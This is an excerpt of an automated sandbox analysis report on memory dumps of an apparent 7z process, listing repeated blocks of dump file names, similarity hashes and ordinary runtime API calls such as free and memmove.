                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: fputs$fputc
                                                                                                                                                                                                        • String ID: $:
                                                                                                                                                                                                        • API String ID: 1185151155-4041779174
                                                                                                                                                                                                        • Opcode ID: 158b50a13c805fd8231fb2a9988c9be95edbaf40012f3606b1facd01aece21a3
                                                                                                                                                                                                        • Instruction ID: ad546d72816c4a6a7d91c42e979acaf33cb46f11194cb7b3446d4885e5a75f39
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 158b50a13c805fd8231fb2a9988c9be95edbaf40012f3606b1facd01aece21a3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 53E06D96308A8085CB169B26E85436D7361FB99FCDF488162EF8E0771ADF2CC148CB15
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                        • String ID: GetLargePageMinimum$kernel32.dll
                                                                                                                                                                                                        • API String ID: 1646373207-2515562745
                                                                                                                                                                                                        • Opcode ID: 9cafdcdec884bdbcba65c699ecbd7ef866ca1a9750535094873ebbbe4fc89029
                                                                                                                                                                                                        • Instruction ID: f27d318ce830a5ac068960a8d47376cb96a813b636bd597f138416d79b969a01
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9cafdcdec884bdbcba65c699ecbd7ef866ca1a9750535094873ebbbe4fc89029
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B3E0B624756B0292EE09DB55FC9536837A0EBAAB54F94487A860E82360EF3CC659C354
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$ErrorLast
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 408039514-0
                                                                                                                                                                                                        • Opcode ID: d7c40869ad587d79d1a4cde6791f56a7827730960875fe2f1716f54cae6806b2
                                                                                                                                                                                                        • Instruction ID: bfeacc897ca9e1746dad99f9af91c737d4d8dec9145442fca25beb1aa99f7678
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d7c40869ad587d79d1a4cde6791f56a7827730960875fe2f1716f54cae6806b2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D9816C32315A4082CB24EF25D48075EB7E1F789BA8F644295EF9E47B68EF38C855C740
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 735d4e83ff881ba3abcc4a6c9aa5d61f64a5c4c51b6bddb4a0ec876fb6e64911
                                                                                                                                                                                                        • Instruction ID: 193fe4cfc1a2e59feea9296fe80ce80ff292f0c2f18883c6708251d629b5a834
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 735d4e83ff881ba3abcc4a6c9aa5d61f64a5c4c51b6bddb4a0ec876fb6e64911
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA41E323316B8096CB20DF22D55026E67E0FB96BE4F4852E1EFAD17B59DF28C549CB00
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$memmove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1534225298-0
                                                                                                                                                                                                        • Opcode ID: 2d6c9dfe1155a16f3a068d7370a8ec758800c3918b65cbcdfef43df97f9f1dc5
                                                                                                                                                                                                        • Instruction ID: 9d937eda5a81b6cf9b9b5d83fd5bde90ce5bcd2dc43214b792024324235a92f9
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2d6c9dfe1155a16f3a068d7370a8ec758800c3918b65cbcdfef43df97f9f1dc5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C241D7272096C085CB20EB25E48025FAFE1F3D6798F184195EF9607B69C7BEC499CB11
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$ErrorLastmemmove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3561842085-0
                                                                                                                                                                                                        • Opcode ID: 835e30b8a2ce9afd242e3c27a4bd6d2521a716217a04de116505d45ba31023b0
                                                                                                                                                                                                        • Instruction ID: 1eca1e5fde5d2fa59b62f56e863d7030cad6f0dc208ea53928b5ece5abb7a4d6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 835e30b8a2ce9afd242e3c27a4bd6d2521a716217a04de116505d45ba31023b0
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D3317073215A4181CB20EF24E49036E73A0FB99BA5F5452A5FB9E477A8EF38C549CB00
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$memmove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1534225298-0
                                                                                                                                                                                                        • Opcode ID: 9a39179057fc4b698db1469c34720306d33abb4d3d1416dbc86e8f68b6a95521
                                                                                                                                                                                                        • Instruction ID: bcb91c66b42e560f40c0e7943f4355d282fdb6f0aabed66f0cfac9fc43e766ce
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9a39179057fc4b698db1469c34720306d33abb4d3d1416dbc86e8f68b6a95521
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5221CE23312B8586DA14EF56E98032AB3A0F745BE6B0C81F5AF2907791DF34C86AC700
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: memcmp
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1475443563-0
                                                                                                                                                                                                        • Opcode ID: 712599938bbeffd81504be00bb0ea2eb8721062aa4075a36f0ea6c542d0c478b
                                                                                                                                                                                                        • Instruction ID: 22fbb0f14942b7d1eb67a6f26800eaafb1d231ee9b642ed1a0b68cd34982dcb7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 712599938bbeffd81504be00bb0ea2eb8721062aa4075a36f0ea6c542d0c478b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 251191A230475199EB04DB269C923B827A6D70AFC6F8890B1CE0557706EF74D949C304
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF), ref: 00B53C2A
                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF), ref: 00B53C36
                                                                                                                                                                                                        • _CxxThrowException.MSVCRT ref: 00B53C54
                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF), ref: 00B53C80
                                                                                                                                                                                                        • _CxxThrowException.MSVCRT ref: 00B53C9E
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ByteCharExceptionMultiThrowWide$ErrorLast
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2296236218-0
                                                                                                                                                                                                        • Opcode ID: 970d5cdc5d485172c45e5e67665dade64923c0f4ace1f899d0aee1bf120422e8
                                                                                                                                                                                                        • Instruction ID: ff348549839415322cb2c15f82dc7f26c11d21f4cce6eca85f87ca0f0bf3300e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 970d5cdc5d485172c45e5e67665dade64923c0f4ace1f899d0aee1bf120422e8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84219DB2700B4986DB10DF26E85031DB7E1FB88F99F448165DF8997724EB78C88AC710
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: bfe4f0f55ee913568f211c4fbf308b9aee0fbd2fe155706c5642a99402e277d4
                                                                                                                                                                                                        • Instruction ID: a0234bdc25e3634b26b056ce25826461c0632ea05a8229614f569685cef7c2d0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: bfe4f0f55ee913568f211c4fbf308b9aee0fbd2fe155706c5642a99402e277d4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA01C023703D4496DA24EF36D91036A2360F783FA5B1843E1AF6D27B90CF24D81AC700
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • free.MSVCRT ref: 00B97DA9
                                                                                                                                                                                                        • free.MSVCRT ref: 00B97DB2
                                                                                                                                                                                                        • free.MSVCRT ref: 00B97DE5
                                                                                                                                                                                                        • free.MSVCRT ref: 00B97DF2
                                                                                                                                                                                                        • free.MSVCRT ref: 00B97DFB
                                                                                                                                                                                                          • Part of subcall function 00B794A8: free.MSVCRT ref: 00B794DB
                                                                                                                                                                                                          • Part of subcall function 00B794A8: free.MSVCRT ref: 00B794E3
                                                                                                                                                                                                          • Part of subcall function 00B794A8: free.MSVCRT ref: 00B794F0
                                                                                                                                                                                                          • Part of subcall function 00B794A8: free.MSVCRT ref: 00B7951C
                                                                                                                                                                                                          • Part of subcall function 00B794A8: free.MSVCRT ref: 00B79525
                                                                                                                                                                                                          • Part of subcall function 00B794A8: free.MSVCRT ref: 00B7952D
                                                                                                                                                                                                          • Part of subcall function 00B794A8: free.MSVCRT ref: 00B7953A
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: 782f6fd7dc41bf8ca513220e7cc76460a379d2f1bbd67af93ff481f02cf2e1fb
                                                                                                                                                                                                        • Instruction ID: 7fc2726733dd1564bd917b8e57610bc5bb121d3ce8402eabe7f902b588e564c1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 782f6fd7dc41bf8ca513220e7cc76460a379d2f1bbd67af93ff481f02cf2e1fb
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F9018F23757D4089CA15AF26DC5136923A4EF47FA5F1801B1AF1D1B315EF20C846C380
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • free.MSVCRT ref: 00B73877
                                                                                                                                                                                                          • Part of subcall function 00B70BBC: free.MSVCRT ref: 00B70BCC
                                                                                                                                                                                                          • Part of subcall function 00B70BBC: free.MSVCRT ref: 00B70BD5
                                                                                                                                                                                                          • Part of subcall function 00B70BBC: free.MSVCRT ref: 00B70C00
                                                                                                                                                                                                          • Part of subcall function 00B70BBC: free.MSVCRT ref: 00B70C08
                                                                                                                                                                                                          • Part of subcall function 00B71474: free.MSVCRT ref: 00B714A6
                                                                                                                                                                                                          • Part of subcall function 00B71474: free.MSVCRT ref: 00B714AF
                                                                                                                                                                                                          • Part of subcall function 00B71474: free.MSVCRT ref: 00B714B8
                                                                                                                                                                                                          • Part of subcall function 00B71474: free.MSVCRT ref: 00B714C0
                                                                                                                                                                                                        • free.MSVCRT ref: 00B73892
                                                                                                                                                                                                        • free.MSVCRT ref: 00B7389B
                                                                                                                                                                                                        • free.MSVCRT ref: 00B738C6
                                                                                                                                                                                                        • free.MSVCRT ref: 00B738CE
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: 18ccfc5564c15e61a23e9604fa5b251626cea37ac211422c809096770ce5a63d
                                                                                                                                                                                                        • Instruction ID: 265eb102cd362eb11b3ee0789c53338d0757b3870fd8b0b15fc2b443b40eb63b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 18ccfc5564c15e61a23e9604fa5b251626cea37ac211422c809096770ce5a63d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 36F0A423B13C5096CA15FF26DD9126D23A0FB86F91B0C41E2AF2D5B751DF20C9668750
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: c213d67050506c93901002ddd1084c0dd65243c9eb9d617befeb87ee319482a8
                                                                                                                                                                                                        • Instruction ID: 9766e149c1ec96218b395636291ba5b0ffa6da582e039bdf1d8f345c695e2075
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c213d67050506c93901002ddd1084c0dd65243c9eb9d617befeb87ee319482a8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E7F06D13703994898A20EF26DC9126927A0AF96BAA71C41F5AF2E17754EE20C8568700
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: 99aac3ebba39b973ad56ba9f7cc64fb651a8512a5e29eea15e4582f1b066fd79
                                                                                                                                                                                                        • Instruction ID: 9479cb4cf28b11f82c282ce24db2708e0d6f3ba255b0791cc58e4cf155dac481
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 99aac3ebba39b973ad56ba9f7cc64fb651a8512a5e29eea15e4582f1b066fd79
                                                                                                                                                                                                        • Instruction Fuzzy Hash: EFF09023713C4489CB25AF36DC5122A2360EB96FD671901E1AF2D2B359DE24C8468740
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: f7456f4712a6592163503973d257ef0995b2ed4d21bfa0f5baa221aafdf9fe8c
                                                                                                                                                                                                        • Instruction ID: 41e57e7f5809bbbf693e4913ec2f58347ee6859459abfc5e2a3aa14b42a2a005
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f7456f4712a6592163503973d257ef0995b2ed4d21bfa0f5baa221aafdf9fe8c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C7F096537039848DCA10EF26DC813592750EF56BAAB1C41F5BF2D17755DF20CC968740
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • free.MSVCRT ref: 00B976AF
                                                                                                                                                                                                        • free.MSVCRT ref: 00B976BB
                                                                                                                                                                                                        • free.MSVCRT ref: 00B976C7
                                                                                                                                                                                                        • free.MSVCRT ref: 00B976D3
                                                                                                                                                                                                          • Part of subcall function 00B9B310: free.MSVCRT ref: 00B9B335
                                                                                                                                                                                                          • Part of subcall function 00B9B310: free.MSVCRT ref: 00B9B342
                                                                                                                                                                                                          • Part of subcall function 00B9B310: free.MSVCRT ref: 00B9B34E
                                                                                                                                                                                                          • Part of subcall function 00B9B310: free.MSVCRT ref: 00B9B358
                                                                                                                                                                                                          • Part of subcall function 00B9B310: free.MSVCRT ref: 00B9B362
                                                                                                                                                                                                          • Part of subcall function 00B9B310: free.MSVCRT ref: 00B9B36C
                                                                                                                                                                                                          • Part of subcall function 00B9B310: free.MSVCRT ref: 00B9B376
                                                                                                                                                                                                          • Part of subcall function 00B9B310: free.MSVCRT ref: 00B9B380
                                                                                                                                                                                                        • free.MSVCRT ref: 00B976E4
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: 80021553301d9a40d6bbe7854cc860826636cb7fafc5824219d75b22b7ddba10
                                                                                                                                                                                                        • Instruction ID: 9c8f96cdedad842cd4e86daba29e34b4892d51f7c76c1e46655bc7cb806162eb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 80021553301d9a40d6bbe7854cc860826636cb7fafc5824219d75b22b7ddba10
